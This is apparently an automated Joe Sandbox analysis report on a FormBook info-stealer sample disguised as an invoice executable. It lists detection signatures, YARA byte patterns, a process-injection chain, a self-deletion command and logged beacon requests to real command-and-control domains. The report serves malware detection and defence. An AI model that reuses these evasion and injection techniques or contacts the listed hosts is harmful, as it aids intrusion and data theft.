Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PT300975-inv.exe

Overview

General Information

Sample Name:PT300975-inv.exe
Analysis ID:323028
MD5:025544a9014cf1667e8a1d4ff68da253
SHA1:0123853e7960cdae4f3ad95945b4ec86adbb93c6
SHA256:2858bfcb9388b05049df45459ee60bf96be0b0d75a3be34cf3c00f57ec9f4469
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PT300975-inv.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\PT300975-inv.exe' MD5: 025544A9014CF1667E8A1D4FF68DA253)
    • mscorsvw.exe (PID: 5844 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: 38368FC9F84C7A27D0C8CD8E1543F172)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 1040 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6064 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x995a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9bd4:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x37018:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x37292:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x63638:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x638b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156f7:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x42db5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x6f3d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151e3:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x428a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x6eec1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157f9:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x42eb7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x6f4d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15971:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x4302f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x6f64f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa5ec:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x37caa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x642ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1847b:$sqlite3step: 68 34 1C 7B E1
    • 0x1858e:$sqlite3step: 68 34 1C 7B E1
    • 0x45b39:$sqlite3step: 68 34 1C 7B E1
    • 0x45c4c:$sqlite3step: 68 34 1C 7B E1
    • 0x72159:$sqlite3step: 68 34 1C 7B E1
    • 0x7226c:$sqlite3step: 68 34 1C 7B E1
    • 0x184aa:$sqlite3text: 68 38 2A 90 C5
    • 0x185cf:$sqlite3text: 68 38 2A 90 C5
    • 0x45b68:$sqlite3text: 68 38 2A 90 C5
    • 0x45c8d:$sqlite3text: 68 38 2A 90 C5
    • 0x72188:$sqlite3text: 68 38 2A 90 C5
    • 0x722ad:$sqlite3text: 68 38 2A 90 C5
    • 0x184bd:$sqlite3blob: 68 53 D8 7F 8C
    • 0x185e5:$sqlite3blob: 68 53 D8 7F 8C
    • 0x45b7b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x45ca3:$sqlite3blob: 68 53 D8 7F 8C
    • 0x7219b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x722c3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.mscorsvw.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.mscorsvw.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.mscorsvw.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        2.2.mscorsvw.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.mscorsvw.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: PT300975-inv.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 2.2.mscorsvw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then push dword ptr [ebp-20h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then push dword ptr [ebp-24h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then xor edx, edx
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then mov ecx, dword ptr [0401E69Ch]
          Source: C:\Users\user\Desktop\PT300975-inv.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi
          Source: global trafficHTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1Host: www.solidconstruct.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1Host: www.asacal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: global trafficHTTP traffic detected: GET /jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD HTTP/1.1Host: www.solidconstruct.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /jqc/?JfEtEZgp=cE9UUOc3pLPT0LAdHSIP3evlMF3IBhbdmq5wG0CQLEBsctkiCkQzhS7S4EgmhhRecsIvRlsotA==&ojq0s=RzulsD HTTP/1.1Host: www.asacal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: g.msn.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000002.604467265.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.367422589.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: PT300975-inv.exe, 00000000.00000002.345062804.00000000013BB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.346082629.0000000004983000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.384709518.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.345935550.000000000489F000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.384973697.0000000004DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.603415993.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.603938511.0000000000DF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.385166130.00000000050D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.604508928.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mscorsvw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.mscorsvw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large array initializationsShow sources
          Source: PT300975-inv.exe, nNu0028/Fx1.csLarge array initialization: d!3: array initializer size 91136
          Source: 0.2.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.csLarge array initialization: d!3: array initializer size 91136
          Source: 0.0.PT300975-inv.exe.c50000.0.unpack, nNu0028/Fx1.csLarge array initialization: d!3: array initializer size 91136
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419D60 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419E10 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419E90 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419D5D NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419E0B NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_00419E8A NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057295F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_0572A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729FE0 NtCreateMutant,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729660 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057296D0 NtCreateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_05729950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeCode function: 2_2_057299D0 NtCreateProcessEx,
